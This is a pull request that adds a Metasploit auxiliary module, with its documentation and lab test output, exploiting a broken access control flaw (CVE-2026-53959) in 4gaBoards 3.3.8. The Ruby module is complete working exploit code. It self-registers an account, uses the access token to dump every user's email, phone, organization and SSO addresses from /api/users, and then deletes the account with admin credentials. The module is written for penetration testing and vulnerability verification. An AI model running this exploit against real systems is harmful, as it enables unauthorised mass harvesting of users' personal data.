### PR TITLE
Add 4gaBoards user information disclosure module (CVE-2026-53959)

### DIFF
--- a/documentation/modules/auxiliary/gather/4gaboards_users_info_disclosure_cve_2026_53959.md
+++ b/documentation/modules/auxiliary/gather/4gaboards_users_info_disclosure_cve_2026_53959.md
@@ -1,0 +1,111 @@
+## Vulnerable Application
+
+4gaBoards in versions 3.3.8 or less, does not enforce authorization checks for /api/users REST API endpoint.
+Any authenticated user can query the endpoint to retrieve information of all users using the application.
+Disclosed information includes sensitive fields like name, email, phone, organization and SSO emails.
+
+The registration endpoint /api/register is open by default and returns an access token even if email verification is enabled.
+So the module first registers a new user account via /api/register and obtains an access token.
+The access token is then used to retrieve all users' information via /api/users.
+If given valid administrator credentials, the module also performs cleanup by deleting the newly registered account.
+
+### Pre-requisites
+- **Docker** and **Docker compose** installed.
+
+## Setup
+
+1. **Download source code**
+```
+wget https://github.com/RARgames/4gaBoards/archive/refs/tags/v3.3.8.zip
+unzip v3.3.8.zip
+cd 4gaBoards-3.3.8
+```
+2. **Generate secret key**
+```
+openssl rand -hex 64
+```
+3. **Modify docker compose file**
+- Replace `SECRET_KEY` with the one generated in the above step
+4. **Start container**
+```
+sudo docker-compose up -d
+```
+
+## Verification Steps
+1. **Launch Metasploit**
+```
+msfconsole
+```
+2. **Load the 4gaBoards User Information Disclosure module**
+```
+use auxiliary/gather/4gaboards_users_info_disclosure_cve_2026_53959.rb
+set RHOSTS 127.0.0.1
+set RPORT 3000
+set TARGETURI /
+set EMAIL test@test.com
+set ADMIN_USERNAME demo
+set ADMIN_PASSWORD demo
+```
+3. **Run the module**
+```
+run
+```
+4. **Observe output**
+
+The module should:
+- Create a new user with the supplied email and obtain an access token
+- Use the access token to dump the information of all users on the application 
+- Delete the newly created user using the supplied admin credentials
+
+## Options
+
+- **TARGETURI**(`/`): Base path to 4gaBoards installation
+- **EMAIL**(`test@test.com`): Email for account creation
+- **ADMIN_USERNAME**(`demo`): Administrator username for cleanup
+- **ADMIN_PASSWORD**(`demo`): Administrator password for cleanup 
+
+## Scenarios
+```
+msf auxiliary(gather/4gaboards_users_info_disclosure_cve_2026_53959) > run
+[*] Running module against 127.0.0.1
+[*] Attempting to register user with email 'test@test.com'
+[+] User 'test@test.com' registered successfully
+[+] Access token obtained for user 'test@test.com'
+[*] Dumping all users information
+[+] Users information saved to: /home/kali/.msf4/loot/20260826101143_default_127.0.0.1_user.information_421246.bin
+[*] Attempting to delete user 'test@test.com'
+[*] Logging in as administrator
+[+] Administrator login successful
+[+] Access token obtained for administrator
+[+] User 'test@test.com' deleted successfully
+[*] Auxiliary module execution completed
+msf auxiliary(gather/4gaboards_users_info_disclosure_cve_2026_53959) > cat /home/kali/.msf4/loot/20260826101143_default_127.0.0.1_user.information_421246.bin[*] exec: cat /home/kali/.msf4/loot/20260826101143_default_127.0.0.1_user.information_421246.bin
+
+[
+  {
+    "id": "1850206427251999750",
+    "createdAt": "2026-08-26T14:09:53.000Z",
+    "updatedAt": null,
+    "email": "demo@demo.demo",
+    "isAdmin": true,
+    "isVerified": false,
+    "name": "Demo Demo",
+    "username": "demo",
+    "phone": null,
+    "organization": null,
+    "ssoGoogleEmail": null,
+    "ssoGithubUsername": null,
+    "ssoGithubEmail": null,
+    "ssoMicrosoftEmail": null,
+    "ssoOidcEmail": null,
+    "lastLogin": "2026-08-26T14:11:32.973Z",
+    "lastEmailVerificationRequestAt": null,
+    "deletedAt": null,
+    "createdById": "1850206427251999750",
+    "updatedById": null,
+    "deletedById": null,
+    "isPasswordAuthenticated": true,
+    "avatarUrl": null
+  }
+]
+```

--- a/documentation/modules/auxiliary/gather/4gaboards_users_info_disclosure_cve_2026_53959.md
+++ b/documentation/modules/auxiliary/gather/4gaboards_users_info_disclosure_cve_2026_53959.md
@@ -25,6 +25,7 @@ cd 4gaBoards-3.3.8
 openssl rand -hex 64
 ```
 3. **Modify docker compose file**
+
 Open docker-compose.yml file and make the following changes:
 - Replace `SECRET_KEY` with the one generated in the above step
 - Change `image: ghcr.io/rargames/4gaboards:latest` to `image: ghcr.io/rargames/4gaboards:3.3.8`

--- a/documentation/modules/auxiliary/gather/4gaboards_users_info_disclosure_cve_2026_53959.md
+++ b/documentation/modules/auxiliary/gather/4gaboards_users_info_disclosure_cve_2026_53959.md
@@ -25,7 +25,9 @@ cd 4gaBoards-3.3.8
 openssl rand -hex 64
 ```
 3. **Modify docker compose file**
+Open docker-compose.yml file and make the following changes:
 - Replace `SECRET_KEY` with the one generated in the above step
+- Change `image: ghcr.io/rargames/4gaboards:latest` to `image: ghcr.io/rargames/4gaboards:3.3.8`
 4. **Start container**
 ```
 sudo docker-compose up -d

--- a/modules/auxiliary/gather/4gaboards_users_info_disclosure_cve_2026_53959.rb
+++ b/modules/auxiliary/gather/4gaboards_users_info_disclosure_cve_2026_53959.rb
@@ -1,0 +1,208 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  require 'json'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => '4gaBoards Mass User Information Disclosure (CVE-2026-53959)',
+        'Description' => %q{
+          This module exploits a broken access control vulnerability in 4gaBoards versions 3.3.8 or less.
+          The /api/users endpoint allows any authenticated user to enumerate account information for every user.
+          Responses expose email, phone, organization, name, isAdmin, ssoGoogleEmail, ssoGithubEmail, and other SSO-linked email fields.
+
+          The module first creates a new user with the supplied email to obtain an access token.
+          The access token is then used to dump information of all users registered on the application.
+          If valid administrator credentials are provided, the module also performs cleanup by deleting the newly created user account.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Balachandar Gowrisankar'
+        ],
+        'References' => [
+          ['CVE', '2026-53959'],
+          ['GHSA', 'p77f-p47g-h72p']
+        ],
+        'DisclosureDate' => '2026-06-05',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, 'Base path to the 4gaBoards installation', '/']),
+        OptString.new('EMAIL', [false, 'Email for account creation', 'test@test.com']),
+        OptString.new('ADMIN_USERNAME', [false, 'Administrator username for cleanup', 'demo']),
+        OptString.new('ADMIN_PASSWORD', [false, 'Administrator password for cleanup', 'demo'])
+      ]
+    )
+  end
+
+  def run
+    print_status("Attempting to register user with email '#{datastore['Email']}'")
+    register_url = normalize_uri(
+      datastore['TARGETURI'],
+      'api',
+      'register'
+    )
+    register_res = send_request_cgi(
+      'uri' => register_url,
+      'method' => 'POST',
+      'headers' => {
+        'Content-Type' => 'application/json'
+      },
+      'data' => {
+        'email' => datastore['EMAIL'],
+        'password' => 'Password@123!',
+        'name' => 'test',
+        'policy' => true
+      }.to_json
+    )
+    if register_res && register_res.code == 409
+      json_data = register_res.get_json_document
+      if json_data.key?('message')
+        fail_with(Failure::BadConfig, "#{json_data['message']}. Supply a different email") # Check if email already exists
+      end
+    elsif register_res && register_res.code == 200
+      begin
+        json_data = register_res.get_json_document
+        if json_data.key?('item')
+          access_token = json_data['item']
+          print_good("User '#{datastore['EMAIL']}' registered successfully")
+          print_good("Access token obtained for user '#{datastore['EMAIL']}'")
+        else
+          fail_with(Failure::NoAccess, 'User registered but access token not found')
+        end
+      rescue JSON::ParserError => e
+        fail_with(Failure::UnexpectedReply, "Failed to parse JSON response: #{e.message}")
+      end
+    else
+      fail_with(Failure::Unreachable, 'Failed to register user')
+    end
+
+    print_status('Dumping all users information')
+    users_url = normalize_uri(
+      datastore['TARGETURI'],
+      'api',
+      'users'
+    )
+    users_res = send_request_cgi(
+      'uri' => users_url,
+      'method' => 'GET',
+      'headers' => {
+        'Authorization' => "Bearer #{access_token}"
+      }
+    )
+    if users_res && users_res.code == 200
+      begin
+        json_data = users_res.get_json_document
+        if json_data.key?('items')
+          infos = json_data['items']
+          for user in infos do
+            if user['email'] == datastore['EMAIL']
+              del_id = user['id'] # Storing the newly created user's ID to help with account deletion later
+            end
+          end
+          infos.delete_if { |info| info['id'] == del_id } # Removing the newly created user's information from the list
+          path = store_loot(
+            'user.information',
+            'application/json',
+            datastore['RHOST'],
+            JSON.pretty_generate(infos)
+          )
+          print_good("Users information saved to: #{path}")
+        else
+          fail_with(Failure::NoAccess, 'Users information not found in response')
+        end
+      rescue JSON::ParserError => e
+        fail_with(Failure::UnexpectedReply, "Failed to parse JSON response: #{e.message}")
+      end
+    else
+      fail_with(Failure::Unreachable, 'Failed to retrieve users information')
+    end
+    print_status("Attempting to delete user '#{datastore['EMAIL']}'")
+    print_status('Logging in as administrator')
+    boundary = "----WebKitFormBoundary#{Rex::Text.rand_text_alphanumeric(16)}"
+
+    data = [
+      "--#{boundary}",
+      'Content-Disposition: form-data; name="emailOrUsername"',
+      '',
+      datastore['ADMIN_USERNAME'],
+      "--#{boundary}",
+      'Content-Disposition: form-data; name="password"',
+      '',
+      datastore['ADMIN_PASSWORD'],
+      "--#{boundary}--",
+      ''
+    ].join("\r\n")
+    login_url = normalize_uri(
+      datastore['TARGETURI'],
+      'api',
+      'access-tokens'
+    )
+    login_res = send_request_cgi(
+      'uri' => login_url,
+      'method' => 'POST',
+      'ctype' => "multipart/form-data; boundary=#{boundary}",
+      'data' => data
+    )
+    if login_res && login_res.code == 200
+      begin
+        json_data = login_res.get_json_document
+        if json_data.key?('item')
+          admin_token = json_data['item']
+          print_good('Administrator login successful')
+          print_good('Access token obtained for administrator')
+        else
+          fail_with(Failure::NoAccess, 'Logged in as administrator but access token not found')
+        end
+      rescue JSON::ParserError => e
+        fail_with(Failure::UnexpectedReply, "Failed to parse JSON response: #{e.message}")
+      end
+    else
+      fail_with(Failure::Unreachable, 'Failed to login as administrator')
+    end
+
+    del_url = normalize_uri(
+      datastore['TARGETURI'],
+      'api',
+      'users',
+      del_id
+    )
+    del_res = send_request_cgi(
+      'uri' => del_url,
+      'method' => 'DELETE',
+      'headers' => {
+        'Authorization' => "Bearer #{admin_token}"
+      }
+    )
+    if del_res && del_res.code == 200
+      begin
+        json_data = del_res.get_json_document
+        if json_data.key?('item')
+          print_good("User '#{datastore['EMAIL']}' deleted successfully")
+        else
+          fail_with(Failure::NoAccess, "Error in deleting user '#{datastore['EMAIL']}'")
+        end
+      rescue JSON::ParserError => e
+        fail_with(Failure::UnexpectedReply, "Failed to parse JSON response: #{e.message}")
+      end
+    else
+      fail_with(Failure::Unreachable, "Failed to delete user '#{datastore['EMAIL']}'")
+    end
+  end
+end

--- a/modules/auxiliary/gather/4gaboards_users_info_disclosure_cve_2026_53959.rb
+++ b/modules/auxiliary/gather/4gaboards_users_info_disclosure_cve_2026_53959.rb
@@ -6,7 +6,6 @@
 class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Report
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::Remote::HTTP::Wordpress
   require 'json'
 
   def initialize(info = {})

--- a/modules/auxiliary/gather/4gaboards_users_info_disclosure_cve_2026_53959.rb
+++ b/modules/auxiliary/gather/4gaboards_users_info_disclosure_cve_2026_53959.rb
@@ -32,9 +32,9 @@ class MetasploitModule < Msf::Auxiliary
         ],
         'DisclosureDate' => '2026-06-05',
         'Notes' => {
-          'Reliability' => UNKNOWN_RELIABILITY,
-          'Stability' => UNKNOWN_STABILITY,
-          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+          'Reliability' => [REPEATABLE_SESSION],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS]
         }
       )
     )


### PR DESCRIPTION
## Description

This module exploits [CVE-2026-53959](https://github.com/RARgames/4gaBoards/security/advisories/GHSA-p77f-p47g-h72p), a broken access control vulnerability that allows mass user information disclosure on 4gaBoards versions 3.3.8 or less. The application's REST API endpoint /api/users allows any authenticated user to retrieve a full, unpaginated list of all users in the system. Due to missing authorization checks, it allows an attacker to retrieve email, phone, organization, name, and SSO emails (ssoGoogleEmail, ssoGithubEmail, etc.) of every single user. 

## Breaking Changes

None

## Reviewer Notes

I could not find a way to include a check method for this module. 

## Verification Steps

1. Set up 4gaBoards version 3.3.8 (instructions are given in the module documentation)
2. Start `msfconsole` and type `use auxiliary/gather/4gaboards_users_info_disclosure_cve_2026_53959`
3. Set target IP, target port, target URI, email, admin username and admin password with `set RHOSTS`, `set RPORT`, `set TARGETURI`, `set EMAIL`, `set ADMIN_USERNAME` and `set ADMIN_PASSWORD`
4. Execute `run`. It should create a new user with the given email, dump all users' information and perform cleanup by deleting the newly created user account. 

## Test Evidence

The module was tested with 4gaBoards version 3.3.8. The module was able to register a new user account and dump all users' information. The module also performed cleanup by deleting the newly created account.

```
msf auxiliary(gather/4gaboards_users_info_disclosure_cve_2026_53959) > run
[*] Running module against 127.0.0.1
[*] Attempting to register user with email 'test@test.com'
[+] User 'test@test.com' registered successfully
[+] Access token obtained for user 'test@test.com'
[*] Dumping all users information
[+] Users information saved to: /home/kali/.msf4/loot/20260826101143_default_127.0.0.1_user.information_421246.bin
[*] Attempting to delete user 'test@test.com'
[*] Logging in as administrator
[+] Administrator login successful
[+] Access token obtained for administrator
[+] User 'test@test.com' deleted successfully
[*] Auxiliary module execution completed
msf auxiliary(gather/4gaboards_users_info_disclosure_cve_2026_53959) > cat /home/kali/.msf4/loot/20260826101143_default_127.0.0.1_user.information_421246.bin[*] exec: cat /home/kali/.msf4/loot/20260826101143_default_127.0.0.1_user.information_421246.bin

[
  {
    "id": "1850206427251999750",
    "createdAt": "2026-08-26T14:09:53.000Z",
    "updatedAt": null,
    "email": "demo@demo.demo",
    "isAdmin": true,
    "isVerified": false,
    "name": "Demo Demo",
    "username": "demo",
    "phone": null,
    "organization": null,
    "ssoGoogleEmail": null,
    "ssoGithubUsername": null,
    "ssoGithubEmail": null,
    "ssoMicrosoftEmail": null,
    "ssoOidcEmail": null,
    "lastLogin": "2026-08-26T14:11:32.973Z",
    "lastEmailVerificationRequestAt": null,
    "deletedAt": null,
    "createdById": "1850206427251999750",
    "updatedById": null,
    "deletedById": null,
    "isPasswordAuthenticated": true,
    "avatarUrl": null
  }
]
```

## Environment

| Field | Details |
|-------|---------|
| **Operating System** | Kali Linux |
| **Target Software/Hardware** | 4gaBoards 3.3.8 |

## AI Usage Disclosure

ChatGPT was used to help with code for JSON parsing and error handling. 

## Pre-Submission Checklist

- [x] Included a corresponding documentation markdown file in `documentation/modules` _(new modules only)_
- [x] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [x] Tested on the target environment specified in the Environment section above
- [x] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)